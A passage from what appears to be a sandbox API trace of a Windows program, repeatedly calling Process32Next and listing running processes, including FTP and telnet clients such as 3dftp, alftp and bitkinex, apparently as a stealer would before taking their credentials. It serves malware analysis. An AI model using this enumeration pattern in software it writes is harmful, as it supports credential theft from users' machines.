RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.474] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.475] GetTickCount () returned 0x1172548 [0175.475] GetCurrentThreadId () returned 0xab0 [0175.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.475] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.476] GetTickCount () returned 0x1172548 [0175.476] GetCurrentThreadId () returned 0xab0 [0175.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.476] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.478] GetTickCount () returned 0x1172548 [0175.478] GetCurrentThreadId () returned 0xab0 [0175.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.478] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.479] GetTickCount () returned 0x1172548 [0175.479] GetCurrentThreadId () returned 0xab0 [0175.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.479] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.480] GetTickCount () returned 0x1172548 [0175.480] GetCurrentThreadId () returned 0xab0 [0175.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.480] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.483] GetTickCount () returned 0x1172548 [0175.483] GetCurrentThreadId () returned 0xab0 [0175.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.483] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.484] GetTickCount () returned 0x1172548 [0175.484] GetCurrentThreadId () returned 0xab0 [0175.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.484] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.485] GetTickCount () returned 0x1172548 [0175.485] GetCurrentThreadId () returned 0xab0 [0175.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.485] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0175.487] GetTickCount () returned 0x1172548 [0175.487] GetCurrentThreadId () returned 0xab0 [0175.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.487] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.488] GetTickCount () returned 0x1172558 [0175.488] GetCurrentThreadId () returned 0xab0 [0175.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.488] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.489] GetTickCount () returned 0x1172558 [0175.489] GetCurrentThreadId () returned 0xab0 [0175.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.489] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.490] GetTickCount () returned 0x1172558 [0175.490] GetCurrentThreadId () returned 0xab0 [0175.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.490] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.492] GetTickCount () returned 0x1172558 [0175.492] GetCurrentThreadId () returned 0xab0 [0175.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.492] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.493] GetTickCount () returned 0x1172558 [0175.493] GetCurrentThreadId () returned 0xab0 [0175.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.493] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.494] GetTickCount () returned 0x1172558 [0175.494] GetCurrentThreadId () returned 0xab0 [0175.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.494] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.496] GetTickCount () returned 0x1172558 [0175.496] GetCurrentThreadId () returned 0xab0 [0175.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.496] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.497] GetTickCount () returned 0x1172558 [0175.497] GetCurrentThreadId () returned 0xab0 [0175.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.497] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.498] GetTickCount () returned 0x1172558 [0175.498] GetCurrentThreadId () returned 0xab0 [0175.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.498] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.500] GetTickCount () returned 0x1172558 [0175.500] GetCurrentThreadId () returned 0xab0 [0175.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.500] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.501] GetTickCount () returned 0x1172558 [0175.501] GetCurrentThreadId () returned 0xab0 [0175.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.501] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.502] GetTickCount () returned 0x1172558 [0175.502] GetCurrentThreadId () returned 0xab0 [0175.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.502] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.504] GetTickCount () returned 0x1172567 [0175.504] GetCurrentThreadId () returned 0xab0 [0175.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.504] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.505] GetTickCount () returned 0x1172567 [0175.505] GetCurrentThreadId () returned 0xab0 [0175.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.505] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="chi.exe")) returned 1 [0175.506] GetTickCount () returned 0x1172567 [0175.506] GetCurrentThreadId () returned 0xab0 [0175.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.506] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="amp.exe")) returned 1 [0175.508] GetTickCount () returned 0x1172567 [0175.508] GetCurrentThreadId () returned 0xab0 [0175.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.508] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sherman-nomination.exe")) returned 1 [0175.509] GetTickCount () returned 0x1172567 [0175.509] GetCurrentThreadId () returned 0xab0 [0175.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.509] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="checking_integration_majority.exe")) returned 1 [0175.510] GetTickCount () returned 0x1172567 [0175.510] GetCurrentThreadId () returned 0xab0 [0175.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.510] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="frcarefultypical.exe")) returned 1 [0175.511] GetTickCount () returned 0x1172567 [0175.511] GetCurrentThreadId () returned 0xab0 [0175.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.511] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ec_lessons.exe")) returned 1 [0175.512] GetTickCount () returned 0x1172567 [0175.513] GetCurrentThreadId () returned 0xab0 [0175.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.513] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="homeland-used.exe")) returned 1 [0175.514] GetTickCount () returned 0x1172567 [0175.514] GetCurrentThreadId () returned 0xab0 [0175.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.514] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="shipped_hormone.exe")) returned 1 [0175.515] GetTickCount () returned 0x1172567 [0175.515] GetCurrentThreadId () returned 0xab0 [0175.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.515] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cambridge knowing.exe")) returned 1 [0175.516] GetTickCount () returned 0x1172567 [0175.516] GetCurrentThreadId () returned 0xab0 [0175.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.517] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="maritime institutional.exe")) returned 1 [0175.518] GetTickCount () returned 0x1172567 [0175.518] GetCurrentThreadId () returned 0xab0 [0175.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.518] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="conditioning-surf-detection.exe")) returned 1 [0175.519] GetTickCount () returned 0x1172577 [0175.519] GetCurrentThreadId () returned 0xab0 [0175.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.519] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="muscles.exe")) returned 1 [0175.521] GetTickCount () returned 0x1172577 [0175.521] GetCurrentThreadId () returned 0xab0 [0175.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.521] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mark drugs.exe")) returned 1 [0175.522] GetTickCount () returned 0x1172577 [0175.522] GetCurrentThreadId () returned 0xab0 [0175.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.522] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="anybody.exe")) returned 1 [0175.524] GetTickCount () returned 0x1172577 [0175.524] GetCurrentThreadId () returned 0xab0 [0175.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.524] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="borders-connected.exe")) returned 1 [0175.526] GetTickCount () returned 0x1172577 [0175.526] GetCurrentThreadId () returned 0xab0 [0175.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.526] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0175.527] GetTickCount () returned 0x1172577 [0175.527] GetCurrentThreadId () returned 0xab0 [0175.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.527] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0175.528] GetTickCount () returned 0x1172577 [0175.528] GetCurrentThreadId () returned 0xab0 [0175.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.529] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0175.530] GetTickCount () returned 0x1172577 [0175.530] GetCurrentThreadId () returned 0xab0 [0175.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.530] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0175.532] GetTickCount () returned 0x1172577 [0175.532] GetCurrentThreadId () returned 0xab0 [0175.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.532] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0175.533] GetTickCount () returned 0x1172577 [0175.533] GetCurrentThreadId () returned 0xab0 [0175.533] RtlAllocateHeap 